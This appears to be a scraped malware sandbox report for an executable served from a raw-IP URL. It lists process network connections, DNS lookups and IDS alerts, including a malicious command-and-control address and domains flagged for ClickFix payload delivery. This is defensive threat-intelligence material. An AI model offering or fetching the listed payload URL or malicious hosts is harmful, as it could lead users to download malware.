http://118.107.44.190:8080/2.exe
HK
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
3352
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6116
slui.exe
128.24.231.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5532
SearchApp.exe
2.16.241.218:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
5532
SearchApp.exe
23.11.41.157:80
ocsp.digicert.com
AKAMAI-AMS
NL
whitelisted
204.79.197.203:80
oneocsp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
8072
main.exe
151.101.2.49:443
urlhaus.abuse.ch
FASTLY
US
whitelisted
8072
main.exe
82.26.74.80:5001
FZINK
DE
malicious

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
  • 20.73.194.208
  • 4.231.128.59
whitelisted
activation-v2.sls.microsoft.com
  • 128.24.231.65
  • 48.192.1.65
whitelisted
www.bing.com
  • 2.16.241.218
  • 2.16.241.201
whitelisted
ocsp.digicert.com
  • 23.11.41.157
whitelisted
oneocsp.microsoft.com
  • 204.79.197.203
whitelisted
google.com
  • 142.251.20.101
  • 142.251.20.138
  • 142.251.20.102
  • 142.251.20.113
  • 142.251.20.139
  • 142.251.20.100
whitelisted
urlhaus.abuse.ch
  • 151.101.2.49
  • 151.101.66.49
  • 151.101.130.49
  • 151.101.194.49
whitelisted
dcdivas.com
  • 158.106.138.96
unknown
enotpidarmot.pw
  • 188.114.96.3
  • 188.114.97.3
unknown
sonra.eutialyson.com
unknown

Threats

PID
Process
Class
Message
2232
svchost.exe
Misc activity
INFO [ANY.RUN] .pw TLD domain request
2232
svchost.exe
Exploit Kit Activity Detected
ET EXPLOIT_KIT Observed DNS Query to ClickFix Domain (dcdivas .com)
8072
main.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
8072
main.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
8072
main.exe
Misc activity
POLICY [ANY.RUN] Python requests User-agent in HTTP request
8072
main.exe
A Network Trojan was detected
ET MALWARE Executable Downloaded From Common Payload Delivery Host (GET)
8072
main.exe
Misc activity
POLICY [ANY.RUN] Python requests User-agent in HTTP request
8072
main.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
8072
main.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 8
8072
main.exe
Misc activity
POLICY [ANY.RUN] Python requests User-agent in HTTP request
Process
Message
v38438.exe
CLR: Managed code called FailFast without specifying a reason.
CritScript.exe
C:\Users\admin\AppData\Local\Temp\JUSCHED.EXE
PPTV(pplive)_forap_1084_9993.exe
[AsynDownload] NewDownload ID:3 url:http://ins.pplive.com/config/pptv/qd-all-slient-onelink-autostart/forqd1084/bind_en-us.ini
dxwsetup.exe
DLL_PROCESS_ATTACH
dxwsetup.exe
DLL_PROCESS_ATTACH
dxwsetup.exe
Invalid parameter passed to C runtime function.
dxwsetup.exe
Invalid parameter passed to C runtime function.
dxwsetup.exe
DLL_PROCESS_DETACH
dxwsetup.exe
DLL_PROCESS_DETACH
autocad_v1.4.exe
[INFO]AppPath: "C:/Users/admin/Desktop/a/autocad_v1.4.exe"